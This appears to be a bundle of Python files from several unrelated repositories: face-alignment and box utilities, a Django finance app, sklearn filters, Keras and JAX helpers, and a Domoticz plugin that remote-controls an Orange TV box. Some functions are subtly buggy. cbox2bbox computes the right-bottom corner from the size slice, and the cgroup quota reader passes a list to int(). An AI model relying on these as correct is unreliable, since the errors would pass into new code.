dsize = _to_size(dsize)
meanshape = np.array(meanshape)
unit = to_unit_shape(meanshape)
ref = (unit - 0.5) * (1 - padding) * \
np.array(dsize).min() + np.array(dsize) / 2
if meanbbox:
meanbbox = np.array(meanbbox)
matrix = umeyama(meanshape, ref)
meanbbox = bbox_affine(meanbbox, matrix)
self.meanbbox = meanbbox
self.ref = ref
self.dsize = dsize
self.padding = padding
self.augments = augments
self.symmetry = symmetry
def _augment(self, item, matrix):
r = self.augments['rotate']
s = self.augments['scale']
t = self.augments['translate']
symmetry = self.symmetry
scale = np.exp(np.random.uniform(-np.log(1 + s), np.log(1 + s)))
translate = np.random.uniform(-t, t) * np.array(self.dsize)
angle = np.random.uniform(-r, r)
jitter = matrix2d.translate(
translate) @ matrix2d.center_rotate_scale_cw(np.array(self.dsize)/2, angle, scale)
if self.symmetry and np.random.choice([True, False]):
# mirror
jitter = matrix2d.hflip(self.dsize[0]) @ jitter
shape = item['shape']
shape = shape[..., symmetry, :]
item['shape'] = shape
return jitter @ matrix
def __call__(self, item) -> dict:
image = item['image']
shape = item['shape']
if self.meanbbox is not None:
bbox = item['bbox']
pts = _bbox_to_corner_points(bbox)
ref = _bbox_to_corner_points(self.meanbbox)
matrix = umeyama(pts, ref)
else:
matrix = umeyama(shape, self.ref)
if self.augments:
matrix = self._augment(item, matrix)
image = item['image']
shape = item['shape']
image = warp_affine(image, matrix, self.dsize)
shape = shape_affine(shape, matrix)
return {
'image': image,
'shape': shape.astype(np.float32)
}
if __name__ == '__main__':
import torch
from xvision.datasets.jdlmk import JDLandmark
from xvision.utils.draw import draw_shapes
from config import cfg
from torch.utils.data import DataLoader
from xvision.models.fa import resfa, mbv2
from xvision.datasets.mmap import MMap
root = '/Users/jimmy/Documents/data/FA/IBUG'
landmark = '/Users/jimmy/Documents/data/FA/FLL2/landmark'
picture = '/Users/jimmy/Documents/data/FA/FLL2/picture'
ctrans = CacheTransform(cfg.size, cfg.padding, cfg.meanshape)
MMap.create('cache.npy', JDLandmark.parse(landmark, picture), ctrans, 6)
transform = Transform(cfg.dsize, cfg.padding, cfg.meanshape, cfg.augments)
data = JDLandmark(landmark, picture, transform)
loader = DataLoader(data, batch_size=1)
model = mbv2()
state = torch.load(
'/Users/jimmy/Documents/github/xvision/workspace/fa/step-00016600.pth', map_location='cpu')
model.load_state_dict(state['model'])
model.eval()
for item in data:
image = item['image']
shape = item['shape']
tensor = torch.from_numpy(image).unsqueeze(
0).permute(0, 3, 1, 2).float() / 255
with torch.no_grad():
pred = model(tensor) * 128
pred = pred.detach().numpy().reshape(-1, 2)
draw_points(image, pred, (0, 0, 255))
draw_points(image, shape, (0, 255, 0))
cv2.imshow("v", image)
k = cv2.waitKey()
if k == ord('q'):
exit()
```
#### File: models/fa/resnet.py
```python
from torchvision.models.resnet import resnet18
def resfa(num_points=106):
return resnet18(num_classes=num_points*2)
if __name__ == '__main__':
import torch
model = resfa()
input = torch.rand(1, 3, 128, 128)
model.eval()
shape= model(input)
print(shape.shape)
```
#### File: xvision/models/iqa.py
```python
import torch
import torch.nn as nn
class IQA(nn.Module):
def __init__(self, backbone, head=None) -> None:
super().__init__()
self.backbone = backbone
self.head = head
def forward(self, x):
x = self.backbone(x)
y = self.head(x)
return y
```
#### File: xvision/ops/anchors.py
```python
import torch
import torch.nn as nn
from numbers import Number
from xvision.ops.boxes import bbox2cbox, cbox2bbox, box_iou_pairwise
def _canonical_anchor(anchor):
x, y, r = 0, 0, 0
if isinstance(anchor, Number):
w, h = anchor, anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 1:
w = h = anchor[0]
elif isinstance(anchor, (list, tuple)) and len(anchor) == 2:
w, h = anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 4:
x, y, w, h = anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 5:
x, y, w, h, r = anchor
else:
raise ValueError(f'Invalid anchor setting with value: {anchor}')
return [x, y, w, h]
class BBoxAnchors(nn.Module):
def __init__(self, num_classes, dsize, strides, fsizes, layouts, iou_threshold=0.3, encode_mean=None, encode_std=None):
"""Anchor generation and matching
This object generates anchors for given detection structure, and matches anchors to ground truths to determine
the score of each anchor. And provide interface to encode/decode bboxes and shapes.
Args:
num_classes (int): number of positive classes
dsize (tuple): input size of model
strides (list): list of strides
fsizes (list): list of feature sizes for detection
layouts (list): anchor layout for each feature level
iou_threshold (float, optional): minimal iou to normalize the score of positive anchor. Defaults to 0.3.
encode_mean ([list, tuple], optional): mean vector of encoded box. Defaults to None.
encode_std ([list, tuple], optional): std vector of encoded box. Defaults to None.
"""
super().__init__()
self.dsize = dsize
self.strides = strides
self.fsizes = fsizes
self.layouts = layouts
self.num_classes = num_classes
self.iou_threshold = iou_threshold
if (encode_mean):
encode_mean = torch.tensor(
encode_mean, dtype=torch.float32).reshape(-1)
assert encode_mean.numel() == 4, "encode_mean should be of 4-element"
else:
encode_mean = torch.zeros(4, dtype=torch.float32)
if (encode_std):
encode_std = torch.tensor(
encode_std, dtype=torch.float32).reshape(-1)
assert encode_std.numel() == 4, "encode_std should be of 4-element"
else:
encode_std = torch.ones(4, dtype=torch.float32)
self.register_buffer('encode_mean', encode_mean)
self.register_buffer('encode_std', encode_std)
anchors = self.generate_anchors(strides, fsizes, layouts)
self.register_buffer('anchors', anchors)
@staticmethod
def generate_layer_anchors(stride, fsize, layout, device=None):
device = torch.device('cpu') if device is None else device
layout = [_canonical_anchor(v) for v in layout]
layout = torch.tensor(
layout, dtype=torch.float32, device=device) # [k, 5]
# generate offset grid
fw, fh = fsize
vx = torch.arange(0.5, fw, dtype=torch.float32, device=device) * stride
vy = torch.arange(0.5, fh, dtype=torch.float32, device=device) * stride
vy, vx = torch.meshgrid(vy, vx)
offsets = torch.stack([vx, vy], dim=-1) # [fh, fw, 2]
anchors = layout.repeat(fh, fw, 1, 1) # [fh, fw, k, 5]
anchors[:, :, :, :2] += offsets[:, :, None, :] # [fh, fw, k, 5]
return anchors
@staticmethod
def generate_anchors(strides, fsizes, layouts, device=None):
anchors = []
for stride, fsize, layout in zip(strides, fsizes, layouts):
layer_anchors = BBoxAnchors.generate_layer_anchors(
stride, fsize, layout, device)
layer_anchors = layer_anchors.reshape(-1, 4)
anchors.append(layer_anchors)
anchors = torch.cat(anchors, dim=0)
return anchors
def update(self, fsizes):
device = self.anchors.device
self.anchors = self.generate_anchors(
self.strides, fsizes, self.layouts, device)
def encode_bboxes(self, bboxes):
# bboxes: [*, k, 4]
# self.anchors: [k, 4]
cboxes = bbox2cbox(bboxes)
centers = (cboxes[..., :2] - self.anchors[..., :2]) / \
self.anchors[..., 2:] # [*, k, 2]
sizes = cboxes[..., 2:] / self.anchors[..., 2:]
sizes = torch.log(sizes) # [*, k, 2]
deltas = torch.cat([centers, sizes], dim=-1)
deltas = (deltas - self.encode_mean) / self.encode_std
return deltas
def decode_bboxes(self, deltas):
deltas = (deltas * self.encode_std) + self.encode_mean
sizes = torch.exp(deltas[..., 2:]) * self.anchors[..., 2:]
centers = deltas[..., :2] * \
self.anchors[..., 2:] + self.anchors[..., :2]
cboxes = torch.cat([centers, sizes], dim=-1)
return cbox2bbox(cboxes)
def encode_points(self, points):
# points: [*, k, p, 2]
deltas = (points - self.anchors[..., None, :2]
) / self.anchors[..., None, 2:]
deltas = (deltas - self.encode_mean[:2]) / self.encode_std[:2]
return deltas
def decode_points(self, deltas):
# deltas: [*, k, p, 2]
deltas = (deltas * self.encode_std[:2]) + self.encode_mean[:2]
points = deltas * self.anchors[...,
None, 2:] + self.anchors[..., None, :2]
return points
def match(self, labels, bboxes):
# labels: [n]
# bboxes: [n, 4]
# points: [n, p, 2] (p is number of points)
# iou_threshold: threshold to determine positive anchor
banchors = cbox2bbox(self.anchors)
# [k, n] where k is number of anchors
iou = box_iou_pairwise(banchors, bboxes)
# find max iou of anchor to determine gt index
max_iou_of_anchor, box_indice = iou.max(dim=1) # [k]
max_iou_of_bbox, anchor_indice = iou.max(dim=0) # [n]
# make sure each target assigend an anchor
for target_index, anchor_index in enumerate(anchor_indice):
max_iou_of_anchor[anchor_index] = max_iou_of_bbox[target_index]
box_indice[anchor_index] = target_index
# find max iou of each box to determine denominant
denominant = max_iou_of_bbox # [n]
denominant[denominant <
self.iou_threshold] = self.iou_threshold # [n]
denominant = denominant[box_indice] # [k]
max_iou_of_anchor[max_iou_of_anchor < self.iou_threshold / 2] = 0
scores = max_iou_of_anchor / denominant # [k]
labels = labels[box_indice]
ignores = labels <= 0
# set ignore as background score
# TODO: support ignore scores with negative values,
# and sigmoid focal loss should take care of this also
scores[ignores] = 0
# scatter to construct confidence tensor
# scores: [k]
labels[ignores] = 0
conf = scores.new_zeros(scores.size(0), self.num_classes + 1)
# conf: [k, c] # c is the number of classes
# index: [k, 1]
labels = labels.unsqueeze(-1) # [k, 1]
scores = scores.unsqueeze(-1) # [k, 1]
conf.scatter_(dim=1, index=labels, src=scores)
return conf[..., 1:], box_indice
def forward(self, labels, bboxes, *others): # we don't encode
# labels: [B, n]
# bboxes: [B, n, 4]
# points: [B, n, p, 2]
batch_scores = []
batch_bboxes = []
batch_others = [[] for _ in others]
for label, bbox, *other in zip(labels, bboxes, *others):
score, indice = self.match(label, bbox)
batch_scores.append(score)
batch_bboxes.append(bbox[indice])
for i, v in enumerate(other):
batch_others[i].append(v[indice])
scores = torch.stack(batch_scores, 0) # B, k, c
bboxes = torch.stack(batch_bboxes, 0) # B, k, 4
res = (scores, bboxes)
if batch_others:
batch_others = [torch.stack(v) for v in batch_others]
res = (*res, *batch_others)
return res
def split(self, scores):
# [B, k, +]
# return [ [B, h1, w1, +], [B, h2, w2, +], [B, h3, w3, +]] where h*, w* is feature size of each level anchor
# h, w, k, 1
last = 0
nums = []
sizes = []
for i, (w, h) in enumerate(self.fsizes):
k = len(self.layouts[i])
nums.append(
(last, last + w * h * k, k)
)
last = last + w * h * k
sizes.append((w, h))
res = []
for (s, l, k), (w, h) in zip(nums, sizes):
r = scores[:, s:l, ...]
shape = [r.shape[0], h, w] + [k] + list(r.shape[3:])
r = r.reshape(shape)
for i in range(k):
res.append(r[:, :, :, i, ...])
return res
```
#### File: xvision/ops/euclidean_loss.py
```python
import torch
def euclidean_loss(inputs, targets, reduction='none'):
# inputs: [B, p, 2]
# target: [B, p, 2]
diff = inputs - targets
loss = torch.norm(diff, p=2, dim=-1)
if reduction == 'sum':
loss = loss.sum()
elif reduction == 'mean':
loss = loss.mean()
return loss
if __name__ == '__main__':
a = torch.rand(128, 98, 2)
b = torch.rand(128, 98, 2)
loss = euclidean_loss(a, b, 'none')
print(loss)
print(loss.shape)
```
#### File: xvision/ops/extract_glimpse.py
```python
import torch
import torch.nn as nn
from typing import Union, Tuple
def extract_glimpse(input: torch.Tensor, size: Tuple[int, int], offsets, centered=True, normalized=True, mode='bilinear', padding_mode='zeros'):
'''Returns a set of windows called glimpses extracted at location offsets
from the input tensor. If the windows only partially overlaps the inputs,
the non-overlapping areas are handled as defined by :attr:`padding_mode`.
Options of :attr:`padding_mode` refers to `torch.grid_sample`'s document.
The result is a 4-D tensor of shape [N, C, h, w]. The channels and batch
dimensions are the same as that of the input tensor. The height and width
of the output windows are specified in the size parameter.
The argument normalized and centered controls how the windows are built:
* If the coordinates are normalized but not centered, 0.0 and 1.0 correspond
to the minimum and maximum of each height and width dimension.
* If the coordinates are both normalized and centered, they range from
-1.0 to 1.0. The coordinates (-1.0, -1.0) correspond to the upper left
corner, the lower right corner is located at (1.0, 1.0) and the center
is at (0, 0).
* If the coordinates are not normalized they are interpreted as numbers
of pixels.
Args:
input (Tensor): A Tensor of type float32. A 4-D float tensor of shape
[N, C, H, W].
size (tuple): 2-element integer tuple specified the
output glimpses' size. The glimpse height must be specified first,
following by the glimpse width.
offsets (Tensor): A Tensor of type float32. A 2-D integer tensor of
shape [batch_size, 2] containing the x, y locations of the center
of each window.
centered (bool, optional): An optional bool. Defaults to True. indicates
if the offset coordinates are centered relative to the image, in
which case the (0, 0) offset is relative to the center of the input
images. If false, the (0,0) offset corresponds to the upper left
corner of the input images.
normalized (bool, optional): An optional bool. Defaults to True. indicates
if the offset coordinates are normalized.
mode (str, optional): Interpolation mode to calculate output values.
Defaults to 'bilinear'.
padding_mode (str, optional): padding mode for values outside the input.
Raises:
ValueError: When normlised set False but centered set True
Returns:
output (Tensor): A Tensor of same type with input.
'''
W, H = input.size(-1), input.size(-2)
if normalized and centered:
offsets = (offsets + 1) * offsets.new_tensor([W/2, H/2])
elif normalized:
offsets = offsets * offsets.new_tensor([W, H])
elif centered:
raise ValueError(
f'Invalid parameter that offsets centered but not normlized')
h, w = size
xs = torch.arange(0, w, dtype=input.dtype,
device=input.device) - (w - 1) / 2.0
ys = torch.arange(0, h, dtype=input.dtype,
device=input.device) - (h - 1) / 2.0
vy, vx = torch.meshgrid(ys, xs)
grid = torch.stack([vx, vy], dim=-1) # h, w, 2
offsets_grid = offsets[:, None, None, :] + grid[None, ...]
# normalised grid to [-1, 1]
offsets_grid = (
offsets_grid - offsets_grid.new_tensor([W/2, H/2])) / offsets_grid.new_tensor([W/2, H/2])
return torch.nn.functional.grid_sample(
input, offsets_grid, mode=mode, align_corners=False, padding_mode=padding_mode)
def extract_multiple_glimpse(input: torch.Tensor, size: Tuple[int, int], offsets, centered=True, normalized=True, mode='bilinear'):
# offsets: [B, n, 2]
patches = []
for i in range(offsets.size(-2)):
patch = extract_glimpse(
input, size, offsets[:, i, :], centered, normalized, mode)
patches.append(patch)
return torch.stack(patches, dim=1)
```
#### File: xvision/ops/multibox.py
```python
import torch.nn.functional as F
from fvcore.nn import sigmoid_focal_loss
from xvision.ops import euclidean_loss
def score_box_loss(target_scores, target_deltas, pred_logits, pred_deltas):
# target_scores: [B, k]
# target_deltas: [B, k, 4]
# pred_scores: [B, k]
# pred_deltas: [B, k, 4]
score_loss = sigmoid_focal_loss(
pred_logits, target_scores, reduction='sum')
maxscore, _ = target_scores.max(-1)
pos_mask = maxscore > 0.5
target_box_deltas_pos = target_deltas[pos_mask].reshape(-1, 2, 2)
pred_box_deltas_pos = pred_deltas[pos_mask].reshape(-1, 2, 2)
box_loss = euclidean_loss(
pred_box_deltas_pos, target_box_deltas_pos, 'sum')
npos = target_box_deltas_pos.shape[0]
return score_loss / npos, box_loss / npos
def score_box_point_loss(target_scores, target_box_deltas, target_point_deltas, pred_logits, pred_box_deltas, pred_point_deltas, point_mask):
# target_scores: [B, k]
# target_box_deltas: [B, k, 4]
# target_point_deltas: [B, k, p, 2]
# point_mask: [B, k]
score_loss = sigmoid_focal_loss(
pred_logits, target_scores, reduction='sum')
maxscore, _ = target_scores.max(-1)
pos_mask = maxscore > 0.5
target_box_deltas_pos = target_box_deltas[pos_mask].reshape(-1, 2, 2)
pred_box_deltas_pos = pred_box_deltas[pos_mask].reshape(-1, 2, 2)
box_loss = euclidean_loss(
pred_box_deltas_pos, target_box_deltas_pos, 'sum')
point_mask = pos_mask & point_mask
target_point = target_point_deltas[point_mask] # -1, p, 2
pred_point = pred_point_deltas[point_mask] # -1, p, 2
point_loss = euclidean_loss(pred_point, target_point, 'sum')
npos = target_box_deltas_pos.shape[0]
npoint = target_point.shape[0]
return score_loss / npos, box_loss / npos, point_loss / npoint
```
#### File: xvision/transforms/boxes.py
```python
import numpy as np
# naming convention:
# bbox means bounding box encoded with bounding points
# cbox means bounding box encoded with center and size
# abox means affine box encoded as affine matrix
# [ u_x, u_y, cx]
# [ v_x, v_y, cy]
# [ 0, 0, 1]
# rbox means bounding rotated box encoding with [cx, cy, w, h, r]
# where r is box rotated angle in radian, and the anchor is clockwise angle
# in image coordinate
# rect means box encoded with [left, top, width, height]
# copy from https://github.com/AffineVision/AffineVision/blob/master/affinevision/transforms/boxes.py
def bbox2abox(bboxes, radians=None):
# bboxes: [*, 4]
# radians: box angle in radian
vectors = (bboxes[..., 2:] - bboxes[..., :2]) / 2
centers = (bboxes[..., 2:] + bboxes[..., :2]) / 2
x_vec = vectors[..., 0]
y_vec = vectors[..., 1]
zeros = np.zeros(x_vec.shape)
ones = np.ones(x_vec.shape)
aboxes = np.stack([x_vec, zeros, centers[..., 0], zeros,
y_vec, centers[..., 1], zeros, zeros, ones], axis=-1)
# reshape
shape = (*x_vec.shape, 3, 3)
aboxes = aboxes.reshape(shape)
if radians is not None:
cos = np.cos(radians)
sin = np.sin(radians)
rotate = np.stack([cos, -sin, zeros, sin, cos, zeros,
zeros, zeros, ones], axis=-1).reshape(shape)
aboxes = rotate @ aboxes
return aboxes
def abox2bbox(aboxes):
"""covnert affine boxes to bounding point box
reference: https://www.iquilezles.org/www/articles/ellipses/ellipses.htm
Args:
aboxes ([np.ndarray]): affine boxes shape with [*, 3, 3]
"""
c = aboxes[..., :2, 2]
e = np.linalg.norm(aboxes[..., :2, :2], ord=2, axis=-1)
bboxes = np.concatenate([c - e, c + e], axis=-1)
return bboxes
def bbox2cbox(bboxes):
sizes = bboxes[..., 2:] - bboxes[..., :2]
centers = (bboxes[..., :2] + bboxes[..., 2:]) / 2
cboxes = np.concatenate([centers, sizes], axis=-1)
return cboxes
def cbox2bbox(cboxes):
halfs = cboxes[..., 2:] / 2
lt = cboxes[..., :2] - halfs
rb = cboxes[..., 2:] + halfs
cboxes = np.concatenate([lt, rb], axis=-1)
return cboxes
def cbox2abox(cboxes):
bboxes = cbox2bbox(cboxes)
return bbox2abox(bboxes)
def abox2cbox(aboxes):
bboxes = abox2bbox(aboxes)
return bbox2cbox(bboxes)
def rbox2abox(rboxes):
radians = rboxes[:, -1]
cboxes = rboxes[:, :4]
bboxes = cbox2bbox(cboxes)
aboxes = bbox2abox(bboxes, radians)
return aboxes
def abox2rbox(aboxes):
# aboxes [*, 3, 3]
radians = np.arctan2(aboxes[..., 1, 0], aboxes[..., 0, 1])
sizes = np.linalg.norm(aboxes[..., :2, :2], ord=2, axis=-2)
centers = aboxes[..., :2, 2]
rboxes = np.concatenate([centers, sizes, radians[..., None]], axis=-1)
return rboxes
def bbox_affine(bboxes, matrix):
aboxes = bbox2abox(bboxes)
aboxes = matrix @ aboxes
return abox2bbox(aboxes)
def bbox2rect(bboxes):
# [*, 4]
sizes = bboxes[..., 2:] - bboxes[..., :2]
return np.concatenate([bboxes[..., :2], sizes], axis=-1)
```
#### File: xvision/transforms/warp.py
```python
import cv2
from .matrix2d import translate
def _pixel_matrix(matrix):
# matrix 是 浮点坐标 -> 浮点坐标, opencv 要 pixel 坐标 -> pixel -> 坐标
# 因此需要需要如下过程
# 1. pixel 坐标 -> 浮点坐标 translate(0.5)
# 2. 浮点坐标 -> 浮点坐标 matrix
# 3. 浮点坐标 -> 像素坐标 translate(-0.5)
return translate(-0.5) @ matrix @ translate(0.5)
def warp_affine(src, M, dsize, *args, **kwargs):
M = _pixel_matrix(M)
return cv2.warpAffine(src, M[:2, :], dsize, *args, **kwargs)
```
#### File: xvision/utils/misc.py
```python
import os
import math
import multiprocessing
# copy and edit from https://github.com/conan-io/conan/blob/develop/conans/client/tools/oss.py
class CpuProperties(object):
def get_cpu_quota(self):
return int(open("/sys/fs/cgroup/cpu/cpu.cfs_quota_us").readlines())
def get_cpu_period(self):
return int(open("/sys/fs/cgroup/cpu/cpu.cfs_period_us").readlines())
def get_cpus(self):
try:
cfs_quota_us = self.get_cpu_quota()
cfs_period_us = self.get_cpu_period()
if cfs_quota_us > 0 and cfs_period_us > 0:
return int(math.ceil(cfs_quota_us / cfs_period_us))
except:
pass
return multiprocessing.cpu_count()
def cpu_count(output=None):
try:
env_cpu_count = os.getenv("CONAN_CPU_COUNT", None)
if env_cpu_count is not None and not env_cpu_count.isdigit():
raise RuntimeError("Invalid CONAN_CPU_COUNT value '%s', "
"please specify a positive integer" % env_cpu_count)
if env_cpu_count:
return int(env_cpu_count)
else:
return CpuProperties().get_cpus()
except NotImplementedError:
output.warn(
"multiprocessing.cpu_count() not implemented. Defaulting to 1 cpu")
return 1 # Safe guess
if __name__ == '__main__':
n = cpu_count()
print(n)
``` |
{
"source": "jimmysyss/cookiecutter",
"score": 2
} |
#### File: cookiecutter/finance/admin.py
```python
from django.contrib import admin
# Register your models here.
from finance.models import Currency
class BaseAdmin(admin.ModelAdmin):
readonly_fields = ('created_by', 'created_date', 'modified_by', 'modified_date', )
def save_model(self, request, obj, form, change):
if change:
obj.modified_by = request.user.username
else:
obj.created_by = request.user.username
obj.modified_by = request.user.username
obj.save()
@admin.register(Currency)
class CurrencyAdmin(BaseAdmin):
list_display = ('full_name', 'name',)
```
#### File: cookiecutter/finance/models.py
```python
from django.contrib.postgres.fields import ArrayField, JSONField, IntegerRangeField
from django.db import models
# Create your models here.
class BaseModel(models.Model):
created_date = models.DateTimeField(auto_now_add=True)
created_by = models.CharField(max_length=50, editable=False)
modified_date = models.DateTimeField(auto_now=True)
modified_by = models.CharField(max_length=50, editable=False)
class Meta:
abstract = True
class Currency(BaseModel):
name = models.CharField(max_length=10, unique=True)
full_name = models.CharField(max_length=50)
display_format = models.CharField(max_length=50)
flag = models.CharField(max_length=10)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "currencies"
class CurrencyPair(BaseModel):
name = models.CharField(max_length=10, unique=True)
display_format = models.CharField(max_length=50)
base_ccy = models.CharField(max_length=10)
alt_ccy = models.CharField(max_length=10)
pass
class Exchange(BaseModel):
pass
class Calendar(BaseModel):
pass
class InterestRate(BaseModel):
pass
class BusinessEntity(BaseModel):
pass
class Instrument(BaseModel):
pass
class Security(BaseModel):
pass
class HelloWorldEntity(BaseModel):
name = models.CharField(max_length=10, unique=True)
array_field = ArrayField(models.CharField(max_length=10), size=8, null=True)
json_field = JSONField(null=True)
integer_range_field = IntegerRangeField(null=True)
def __str__(self):
return self.name
```
#### File: cookiecutter/finance/views.py
```python
from django.http import HttpResponse
from rest_framework import viewsets
from finance.models import Currency, HelloWorldEntity
from finance.serializer import HelloWorldEntitySerializer
def index(request):
return HttpResponse("Hello, world. You're at the polls index.")
class HelloWorldEntityViewSet(viewsets.ModelViewSet):
queryset = HelloWorldEntity.objects.all()
serializer_class = HelloWorldEntitySerializer
``` |
{
"source": "Jimmy-Tempest/Blokk",
"score": 2
} |
#### File: backend/api/middleware.py
```python
import logging
from django.contrib.auth import authenticate
class JWTAuthMiddleware:
def __init__(self, get_response):
self.get_response = get_response
# One-time configuration and initialization.
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
logging.info("JWTAuthMiddleware called")
# authenticate user
try:
user = authenticate(request)
if user is not None and user.is_authenticated:
logging.info("JWTAuthMiddleware user set " + str(user))
request.user = user
except Exception as err:
logging.info("JWTAuthMiddleware failed " + str(err))
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
``` |
{
"source": "Jimmy-Tempest/Network-Wirer",
"score": 3
} |
#### File: api/filters/filters.py
```python
import numpy as np
from sklearn.utils import shuffle
from sklearn.preprocessing import MinMaxScaler, StandardScaler, LabelEncoder, Normalizer, OrdinalEncoder, LabelBinarizer
from sklearn.feature_extraction.text import CountVectorizer
from pandas import read_csv
# url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/sonar.csv"
# url = "http://127.0.0.1:8000/media/datasets/user_1/mnist_train.csv"
# dataset = read_csv(url)
# dataset = dataset[["Tweets", "label"]]
# # print(dataset)
# data = dataset.values
# X, y = data[0:, :], data[0, :]
# print(X)
# print(X)
# y = LabelEncoder().fit_transform(y.astype('str'))
# trans = CountVectorizer()
# X = trans.fit_transform(X)
# model = Sequential([
# Dense(units=16, activation="relu"),
# Dense(units=32, activation="relu"),
# Dense(units=32, activation="relu"),
# Dense(units=64, activation="relu"),
# Dense(units=2, activation="softmax")
# ])
# model.compile(optimizer=Adam(learning_rate=0.0001),
# loss="sparse_categorical_crossentropy", metrics=["accuracy"])
# model.fit(x=X, y=y, validation_split=0.2, epochs=50, shuffle=True)
transformers = {
"minMax": MinMaxScaler(),
"Standardize": StandardScaler(),
"label": LabelEncoder(),
"normalize": Normalizer(),
"ordinalEncoder": OrdinalEncoder(),
"binarize": LabelBinarizer()
}
# print(filters["water"])
def applyFilter(data, filters):
for filter in filters:
try:
transformer = transformers[filter]
except KeyError:
continue
if filter == "label":
data = transformer.fit_transform(data)
data = transformer.fit_transform(data.astype(np.float32))
# print(data)
return(data)
``` |
{
"source": "Jimmy-Tempest/SaNNs",
"score": 3
} |
#### File: utils/loss/__init__.py
```python
from .categorical_cross_entropy import categorical_cross_entropy
from jax import jit, vmap
import jax.numpy as np
def calc_loss(y_hat, y, loss_fn):
"""
Description:
Calculate the loss.
Params:
y_hat: np.ndarray
The predicted output.
y: np.ndarray
The true output.
loss_fn: function
The loss function.
"""
batch_loss = vmap(jit(loss_fn))
return np.mean(batch_loss(y_hat, y))
``` |
{
"source": "Jimmy-Tempest/SWIM-Intent",
"score": 3
} |
#### File: SWIM-Intent/utils/model.py
```python
from keras.layers import Dense
from keras.models import Sequential
import keras
import tensorflow as tf
import tflearn # important do not remove
def create_model(training_shape:int, output_shape:int):
model = Sequential([
Dense(8, input_shape=(training_shape, ), activation="relu"),
Dense(8, activation="relu"),
Dense(output_shape, activation="softmax")
])
loss = keras.losses.BinaryCrossentropy(from_logits=False)
optim = tf.optimizers.Adam(lr=0.0083)
metrics = ["accuracy"]
# print("\nCompiling Model...\n")
model.compile(loss=loss, optimizer=optim, metrics=metrics)
return model
def train_model(model:Sequential, training, output, epoch:int = 50, filename="model.h5", save=False, callbacks=None):
model.fit(training, output, epochs=epoch, verbose=2, callbacks=callbacks, batch_size=8, shuffle=True)
if save:
model.save(filename)
return model
``` |
{
"source": "JimmyTournemaine/OrangeTV",
"score": 3
} |
#### File: JimmyTournemaine/OrangeTV/plugin.py
```python
import json
import os
errmsg = ""
try:
import Domoticz
except Exception as e:
errmsg += "Domoticz core start error: "+str(e)
class ContextFactory:
def create(self, conn, status):
osdContext = status['osdContext']
if osdContext == 'MAIN_PROCESS':
context = OffContext()
elif osdContext == 'LIVE':
context = LiveContext(status['playedMediaId'])
else:
context = OnContext(osdContext)
return context.connect(conn)
class Context:
def __init__(self, state, text):
self.state = state
self.text = text
def connect(self, tvConn):
self.conn = tvConn
return self
def send(self, key, mode=0, op="01"):
self.conn.Send(
{'Verb': 'GET', 'URL': f'/remoteControl/cmd?operation={op}&mode={mode}&key={key}'})
class OffContext(Context):
def __init__(self):
super().__init__(State.OFF, 'Off')
class OnContext(Context):
def __init__(self, status):
super().__init__(State.ON, status.title())
def onHome(self):
self.send(139)
def onInfo(self):
pass
def onBack(self):
self.send(158)
def onContextMenu(self):
self.send(139)
def onSelect(self):
self.send(352)
def onUp(self):
self.send(103)
def onLeft(self):
self.send(105)
def onRight(self):
self.send(106)
def onDown(self):
self.send(108)
def onChannels(self):
pass
def onChannelUp(self):
self.send(402)
def onChannelDown(self):
self.send(403)
def onFullScreen(self):
pass
def onShowSubtitles(self):
self.send(0)
def onStop(self):
pass
def onVolumeUp(self):
self.send(115)
def onVolumeDown(self):
self.send(114)
def onMute(self):
self.send(113)
def onPlayPause(self):
self.send(164)
def onFastForward(self):
self.send(159)
def onBigStepForward(self):
pass
def onRewind(self):
self.send(168)
def onBigStepBack(self):
pass
class LiveContext(OnContext):
def __init__(self, playId):
super().__init__(State.PLAYING, f'Live: {epg_map[playId]}')
class State:
OFF = 0
ON = 1
PLAYING = 7
DISCONNECTED = 8
UNKNOWN = 10
def is_running(Device):
return Device.nValue > 0
def load_epg():
plug_dir = os.path.dirname(os.path.realpath(__file__))
with open(f"{plug_dir}/epg_id.json") as epg_file:
epg = json.load(epg_file)
return {v: k for k, v in epg.items()}
epg_map = load_epg()
class Plugin:
status = {}
def __init__(self):
return
def onStart(self):
if errmsg == "":
# Debugging
Domoticz.Debugging(1)
if (len(Devices) == 0):
Domoticz.Device(Name="Status", Unit=1, Type=244,
Subtype=73, Switchtype=17, Used=1).Create()
Domoticz.Log("Device created.")
self.OrangeTVConn = Domoticz.Connection(
Name="OrangeTVConn", Transport="TCP/IP", Protocol="HTTP", Address=Parameters["Address"], Port=Parameters["Port"])
self.OrangeTVConn.Connect()
Domoticz.Heartbeat(Parameters["Interval"])
else:
Domoticz.Error(
"Plugin::onStart: Domoticz Python env error {}".format(errmsg))
def onConnect(self, Connection, Status, Description):
if (Status == 0):
Domoticz.Log("Connected successfully to: " +
Connection.Address+":"+Connection.Port)
else:
Domoticz.Log("Failed to connect ("+str(Status)+") to: " +
Connection.Address+":"+Connection.Port)
Domoticz.Debug("Failed to connect ("+str(Status)+") to: " +
Connection.Address+":"+Connection.Port+" with error: "+Description)
return True
def onDisconnect(self, Connection):
Devices[1].Update(8, 'Disconnected')
def onMessage(self, Connection, Data):
if int(Data['Status']) == 200:
Response = json.loads(Data['Data'])
# Update player status
if 'result' in Response and 'data' in Response['result'] and 'osdContext' in Response['result']['data']:
self.onStatusUpdated(Response['result']['data'])
return
Domoticz.Log(f"Unexpected response: {str(Data)}")
else:
Domoticz.Log(f"Error response: {str(Data)}")
def onCommand(self, Unit, Command, Level, Color):
Domoticz.Debug("onCommand called for Unit " + str(Unit) +
": Parameter '" + str(Command) + "', Level: " + str(Level))
if Unit in Devices:
Device = Devices[Unit]
# Switch Off
if Command == 'Off' and is_running(Device):
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=01&mode=0&key=116'})
Device.Update(0, 'Off')
# Switch On
elif Command == 'On' and not is_running(Device):
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=01&mode=0&key=116'})
Device.Update(1, 'On')
# Other command on a running device
elif f"on{Command}" in self.context and is_running(Device):
getattr(self.context, f"on{Command}")()
# Unknown command
else:
Domoticz.Error(f"Unknown command {str(Command)}")
